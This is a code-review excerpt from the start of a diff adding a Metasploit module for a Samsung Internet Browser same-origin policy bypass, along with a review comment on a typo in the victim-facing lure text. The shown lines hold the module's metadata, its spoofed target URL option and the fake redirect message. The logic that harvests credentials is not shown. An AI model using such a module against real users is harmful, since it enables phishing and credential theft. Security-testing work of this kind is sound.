modules/auxiliary/gather/samsung_browser_sop_bypass.rb

```diff
@@ -0,0 +1,142 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'           => "Samsung Internet Browser SOP Bypass",
+        'Description'    => %q(
+          This module takes advantage of a Same-Origin Policy (SOP) bypass vulnerability in the
+          Samsung Internet Browser, a popular mobile browser shipping with Samsung Android devices.
+          By default, it initiates a redirect to a child tab, and rewrites the innerHTML to gather
+          credentials via a fake pop-up.
+        ),
+        'License'        => MSF_LICENSE,
+        'Author'         => [
+          'Dhiraj Mishra', # Original discovery, disclosure
+          'Tod Beardsley', # Metasploit module
+          'Jeffrey Martin' # Metasploit module
+        ],
+        'References'     => [
+        ['URL', 'http://fr.0day.today/exploit/description/28434'],
+        ],
+        'DisclosureDate' => "Nov 08 2017",
+        'Actions'        => [[ 'WebServer' ]],
+        'PassiveActions' => [ 'WebServer' ],
+        'DefaultAction'  => 'WebServer'
+      )
+    )
+
+  register_options([
+      OptString.new('TARGET_URL', [
+        true,
+        "The URL to spoof origin from.",
+        'http://example.com/'
+      ]),
+      OptString.new('CUSTOM_HTML', [
+        true,
+        "HTML to display to the victim.",
+        'This page has moved. Please <a href="#">click here</a> redirect your browser.'
```

Comment:
Consider `'This page has moved. Please <a href="#">click here</a> to redirect your browser.'`

Reply:
Finally saw the missing 'to'